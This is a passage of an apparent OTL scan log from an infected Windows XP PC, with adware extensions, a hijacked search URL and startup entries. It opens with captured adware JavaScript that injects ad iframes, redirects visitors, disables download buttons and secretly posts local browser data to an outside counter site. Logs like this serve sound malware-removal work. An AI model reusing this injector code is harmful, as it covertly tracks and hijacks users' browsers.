[440,size]);}}catch(e){return !1;}},cpx_int47_tr:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.c...size &referrer=' (atp?atp:1), [441,size]);}}catch(e){return !1;}},cpx_int41_tr:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.c...size &referrer=' (atp?atp:1), [444,size]);}}catch(e){return !1;}},clove_fixed_us_uk:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2077387\",\"300x250\":\"2076962\",\"160x600\":\"2077388\"}[size];var surl = \"http://ads.clovenetwork.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [445,size]);}}catch(e){return !1;}},mindads_rmx_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com...on_code=289_945' (atp?atp:1), [458,size]);}}catch(e){return !1;}},cpx_favorhythmic:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.c...size &referrer=' (atp?atp:1), [460,size]);}}catch(e){return !1;}},adfish_hasoffers:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr ={\"300x250\":\"4\",\"160x600\":\"6\",\"728x90\":\"2\",}[size];var surl = \"http://adfishmedia.go2cloud.org/aff_ad?campaign_id=\"+arr+\"&aff_id=4276&format=iframe\";;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [461,size]);}}catch(e){return !1;}},mediawhite_nontb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2120863\",\"300x250\":\"2120862\",\"160x600\":\"2120861\"}[size];var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [463,size]);}}catch(e){return !1;}},matomy_adj8:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2122636\",\"300x250\":\"2122633\",\"160x600\":\"2122638\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [464,size]);}}catch(e){return !1;}},matomy_adj8_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2122637\",\"300x250\":\"2122634\",\"160x600\":\"2122640\"}[size];var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [465,size]);}}catch(e){return !1;}},mmg_new222:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://srv1.mediads....&q=&pub_domain=' (atp?atp:1), [466,size]);}}catch(e){return !1;}},adstract_adwp_new2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/...067&size= size ' (atp?atp:1), [469,size]);}}catch(e){return !1;}},mari_nontb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size == '120x60' )return; var arr={\"728x90\":\"2119652\",\"300x250\":\"2119654\",\"468x60\":\"2119655\",\"120x600\":\"2119656\",\"160x600\":\"2119653\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [459,size]);}}catch(e){return !1;}},cpx_nontb30_tr:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.c...size &referrer=' (atp?atp:1), [442,size]);}}catch(e){return !1;}},dsnr_strm_t1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size == \"120x60\") return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/...size &referrer=' (atp?atp:1), [453,size]);}}catch(e){return !1;}},mari_strm4:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2121065\",\"300x250\":\"2121064\",\"160x600\":\"2121063\"}[size];var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [462,size]);}}catch(e){return !1;}},matomy_strm5_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2122667\",\"300x250\":\"2122661\",\"160x600\":\"2122669\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [467,size]);}}catch(e){return !1;}},matomy_strm5:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2122666\",\"300x250\":\"2122660\",\"160x600\":\"2122668\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [468,size]);}}catch(e){return !1;}},hulk_porn:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600 300x600 250x250 600x400'.indexOf(size)) return !1;var atp=false;var surl='http://syndication.e...thumb=0&idzone=' + {\"728x90\":\"638635\",\"300x250\":\"638633\",\"468x60\":\"774737\",\"120x600\":\"774751\",\"160x600\":\"638637\",\"300x600\":\"774753\",\"250x250\":\"774743\",\"600x400\":\"774747\"}[size] + '&idsite=225117&p='+encodeURIComponent(window.self.location.href)+'&dt=' + Math.random();;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [420,size]);}}catch(e){return !1;}}}};_zyad.init();;(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"0vPHAyyY=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"0vPHAyyY=\")){var d=a.match(/0vPHAyyY=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8lkGhVWzmPhd9GpdUMCyVUojU9qih7hftHAe0KojYMgNtLD6qVCT9GtMDPhd9EtMZPhd9FrHk4pdC5rdsGrdkEpjkGqTU=\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){-1<window.self.location.hostname.indexOf(\"kass.t\")&&setTimeout(function(){if(document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\")){var a=document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\"),b=document.createElement(\"div\");b.setAttribute(\"style\",\"width:100%;height:300%;position:absolute;left:0;top:0\");b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">';a.style.position=\"relative\";a.appendChild(b)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(a=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),b=document.createElement(\"div\"),b.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">',a.style.position=\"relative\",a.appendChild(b))},250);if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var d=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var a=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+a.top+\"px;left:\"+a.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(b){}},c=document.createElement(\"script\");c.type=\"text/javascript\";c[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+d.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild©}if(-1<window.self.location.hostname.indexOf(\"irpy.co\")&&window.self==window.top)try{d=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),$(\"#mp3-with-trinity\").remove()}catch(a){}},-1<!navigator.userAgent.indexOf(\"chrome\")?d():(c=document.createElement(\"script\"),c.innerHTML=\"(\"+d.toString()+\")()\",document.body.appendChild©)}catch(e){}if('GB'!='US'&&-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")){var d=document.createElement(\"img\");d.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\");d.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\";var a=document.getElementById(\"r1113566095\").parentNode;a.style.position=\"relative\";a.appendChild(d)};})();if(window.self.location.hostname.indexOf('hesefiles.c')>-1) window.self.location.href='about:blank';if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+\")()\";document.body.appendChild(s)}};if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d[i]&&d[i].style&&\"fixed\"==d[i].style.position&&\"solid\"==d[i].style.borderBottomStyle&&(d[i].style.display=\"none\")};if(-1<window.self.location.hostname.indexOf(\"oolrom.com\")){var date=new Date;date.setTime(date.getTime()+2592E6);var expires=\"; expires=\"+date.toGMTString();document.cookie=\"installer=14604\"+expires+\"; path=/;domain=.coolrom.com\"};;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://yt.jobfindgold.info/e/?eid=289&hid=135987802205095269&pid=945&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer.length)for(var i=0;i<c2soffer.length;i++)c2soffer[i].parentNode.removeChild(c2soffer[i]);document.getElementById('w3uyh7g6h7f5x')&&document.getElementById('w3uyh7g6h7f5x').parentNode.removeChild(document.getElementById('w3uyh7g6h7f5x'))}})();(function(){void(0)})()");
FF - prefs.js..keyword.URL: "http://dts.search-re...&o=APN10645&q="


FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\system32\Macromed\Flash\NPSWF32_11_9_900_170.dll ()
FF - HKLM\Software\MozillaPlugins\@rocketlife.com/RocketLife Secure Plug-In Layer;version=1.0.5: C:\Documents and Settings\All Users\Application Data\Visan\plugins\npRLSecurePluginLayer.dll (RocketLife, LLP)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.1.2: C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 26.0\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013/12/11 15:22:01 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 26.0\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2013/12/11 15:22:06 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\{1266764D-FC4F-4FA7-B63B-884D53B1680F}: C:\Documents and Settings\Administrator\Application Data\NetAssistant\ [2011/10/05 17:24:24 | 000,000,000 | ---D | M]

[2013/09/01 22:05:03 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Administrator\Application Data\Mozilla\Extensions
[2013/12/14 12:52:52 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\extensions
[2013/12/14 12:52:52 | 000,000,000 | ---D | M] (FreeSoundRecorder) -- C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\extensions\{32b29df0-2237-4370-9a29-37cebb730e9b}
[2013/02/25 00:34:49 | 000,000,000 | ---D | M] (Search-Results Toolbar) -- C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\extensions\{377e5d4d-77e5-476a-8716-7e70a9272da0}
[2013/08/28 15:55:18 | 000,000,000 | ---D | M] (DownloadHelper) -- C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}
[2013/09/01 23:06:12 | 000,000,000 | ---D | M] (saveansHare) -- C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\extensions\[email protected]
[2014/02/03 16:26:40 | 000,001,635 | ---- | M] () -- C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\searchplugins\ixquick-https.xml
[2013/10/27 17:31:54 | 000,002,115 | ---- | M] () -- C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\searchplugins\MyStart Search.xml
[2013/02/25 00:34:41 | 000,002,687 | ---- | M] () -- C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\ub598o2b.default\searchplugins\Search_Results.xml
[2013/12/11 15:22:02 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\extensions
[2013/12/11 15:22:02 | 000,000,000 | ---D | M] (Skype Click to Call) -- C:\Program Files\Mozilla Firefox\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}
[2013/12/11 15:21:59 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\browser\extensions
[2013/12/11 15:21:59 | 000,000,000 | ---D | M] (Skype Click to Call) -- C:\Program Files\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}
[2013/12/11 15:23:12 | 000,000,000 | ---D | M] (Default) -- C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
[2012/06/16 07:17:28 | 000,085,472 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll
[2012/04/20 20:18:25 | 000,002,252 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\bing.xml
[2013/02/25 00:34:41 | 000,002,687 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\Search_Results.xml
[2012/04/20 20:18:25 | 000,002,040 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\twitter.xml

========== Chrome ==========

CHR - Extension: saveansHare = C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\ocgoejamkoggkmcieekgaahloaembkbc\5.10\

O1 HOSTS File: ([2012/06/30 16:51:38 | 000,000,098 | ---- | M]) - C:\WINDOWS\system32\drivers\etc\Hosts
O1 - Hosts: 127.0.0.1 localhost
O1 - Hosts: ::1 localhost
O2 - BHO: (Skype Browser Helper) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O3 - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.
O3 - HKU\S-1-5-21-515967899-1604221776-1417001333-500\..\Toolbar\WebBrowser: (no name) - {472734EA-242A-422B-ADF8-83D1E48CC825} - No CLSID value found.
O4 - HKLM..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k File not found
O4 - HKLM..\Run: [MSC] c:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4 - HKLM..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe (Ahead Software Gmbh)
O4 - HKLM..\Run: [NvCplDaemon] C:\WINDOWS\System32\NvCpl.dll (NVIDIA Corporation)
O4 - HKLM..\Run: [NVHotkey] C:\WINDOWS\System32\nvhotkey.dll (NVIDIA Corporation)
O4 - HKLM..\Run: [NvMediaCenter] C:\WINDOWS\System32\NvMcTray.dll (NVIDIA Corporation)
O4 - HKLM..\Run: [nwiz] C:\WINDOWS\System32\nwiz.exe ()
O4 - HKLM..\Run: [OtShot] C:\Program Files\OtShot\otshot.exe -minimize File not found
O4 - HKLM..\Run: [REGSHAVE] C:\Program Files\REGSHAVE\REGSHAVE.EXE (FUJI PHOTO FILM CO., LTD.)
O4 - HKLM..\Run: [SigmatelSysTrayApp] C:\Program Files\SigmaTel\C-Major Audio\WDM\stsystra.exe (SigmaTel, Inc.)
O4 - Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ExifLauncher2.lnk = C:\Program Files\FinePixViewer\QuickDCF2.exe (FUJIFILM Corporation)
O7 - HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-21-515967899-1604221776-1417001333-500\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 157
O9 - Extra Button: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1 4.2.2.2
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{1DA2D542-9DB1-4ED2-83DB-7E6787DD9A25}: DhcpNameServer = 192.168.1.1 4.2.2.2
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{3D27322F-F708-4BD9-BFB0-B4DBBD8B4353}: DhcpNameServer = 192.168.1.1 192.168.0.1
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O18 - Protocol\Handler\skype-ie-addon-data {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O20 - AppInit_DLLs: (c:\progra~1\search~1\datamngr\datamngr.dll) - File not found
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\WINDOWS\system32\userinit.exe) - C:\WINDOWS\system32\userinit.exe (Microsoft Corporation)
O24 - Desktop WallPaper: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Desktop Background.bmp
O24 - Desktop BackupWallPaper: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Desktop Background.bmp
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2011/04/15 14:00:56 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)

NetSvcs: 6to4 - File not found
NetSvcs: HidServ - %SystemRoot%\System32\hidserv.dll File not found
NetSvcs: Ias - File not found
NetSvcs: Iprip - File not found
NetSvcs: Irmon - File not found
NetSvcs: NWCWorkstation - File not found
NetSvcs: Nwsapagent - File not found
NetSvcs: WmdmPmSp - File not found

CREATERESTOREPOINT
Restore point Set: OTL Restore Point

========== Files/Folders - Created Within 30 Days ==========

[2013/12/28 17:37:42 | 000,000,000 | ---D | C] -- C:\WINDOWS\Minidump

========== Files - Modified Within 30 Days ==========

[2014/01/14 18:42:41 | 000,000,384 | -H-- | M] () -- C:\WINDOWS\tasks\Microsoft Antimalware Scheduled Scan.job
[2014/01/14 18:41:00 | 000,000,830 | ---- | M] () -- C:\WINDOWS\tasks\Adobe Flash Player Updater.job
[2014/01/14 18:33:05 | 000,000,664 | ---- | M] () -- C:\WINDOWS\System32\d3d9caps.dat
[2014/01/14 18:33:03 | 000,017,408 | ---- | M] () -- C:\WINDOWS\System32\rpcnetp.exe
[2014/01/14 18:32:58 | 000,069,792 | ---- | M] (Absolute Software Corp.) -- C:\WINDOWS\System32\rpcnet.dll
[2014/01/14 18:32:35 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2014/01/14 15:33:45 | 000,000,153 | RHS- | M] () -- C:\Documents and Settings\All Users\Application Data\3002.xml
[2014/01/13 08:51:37 | 000,001,374 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2013/12/26 16:25:23 | 000,000,719 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\VLC media player.lnk
[2013/12/26 16:23:31 | 024,097,311 | ---- | M] () -- C:\Documents and Settings\Administrator\My Documents\vlc-2.1.2-win32.exe
[2013/12/20 09:27:52 | 000,000,174 | ---- | M] () -- C:\Documents and Settings\Administrator\Desktop\Chris Kepner Guitar E-mail.rtf
[2013/12/15 19:50:39 | 000,003,738 | ---- | M] () -- C:\Documents and Settings\Administrator\Desktop\Mingus quote.rtf

========== Files Created - No Company Name ==========

[2013/12/26 16:21:14 | 024,097,311 | ---- | C] () -- C:\Documents and Settings\Administrator\My Documents\vlc-2.1.2-win32.exe
[2013/12/20 09:27:52 | 000,000,174 | ---- | C] () -- C:\Documents and Settings\Administrator\Desktop\Chris Kepner Guitar E-mail.rtf
[2013/07/10 22:15:57 | 000,000,153 | RHS- | C] () -- C:\Documents and Settings\All Users\Application Data\3002.xml
[2013/07/10 22:15:45 | 000,019,472 | RHS- | C] () -- C:\Documents and Settings\All Users\Application Data\3002.abs
[2012/08/30 17:32:17 | 000,000,664 | ---- | C] () -- C:\WINDOWS\System32\d3d9caps.dat
[2012/08/13 20:12:44 | 000,000,136 | ---- | C] () -- C:\Documents and Settings\Administrator\Local Settings\Application Data\fusioncache.dat
[2012/08/13 19:58:10 | 000,112,260 | ---- | C] () -- C:\WINDOWS\hpoins07.dat.temp
[2012/08/13 19:58:10 | 000,021,124 | ---- | C] () -- C:\WINDOWS\hpomdl07.dat.temp
[2012/05/22 19:41:16 | 000,049,152 | ---- | C] () -- C:\WINDOWS\Domino.exe
[2012/05/16 18:21:29 | 000,015,872 | ---- | C] () -- C:\Documents and Settings\Administrator\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2012/05/16 10:18:32 | 000,000,069 | ---- | C] () -- C:\WINDOWS\NeroDigital.ini
[2011/11/15 00:25:53 | 000,320,526 | ---- | C] () -- C:\Documents and Settings\LocalService\Local Settings\Application Data\WPFFontCache_v0400-S-1-5-21-515967899-1604221776-1417001333-500-0.dat
[2011/11/15 00:25:52 | 000,185,618 | ---- | C] () -- C:\Documents and Settings\LocalService\Local Settings\Application Data\WPFFontCache_v0400-System.dat

========== LOP Check ==========

[2012/01/30 13:09:46 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrator\Application Data\Amazon
[2014/01/11 18:01:45 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrator\Application Data\Audacity
[2012/05/16 18:05:42 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrator\Application Data\Clone2Go Video Converter Free Version
[2013/11/23 16:11:00 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrator\Application Data\ConverterLite
[2012/06/29 13:31:03 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrator\Application Data\Cool Record Edit Pro
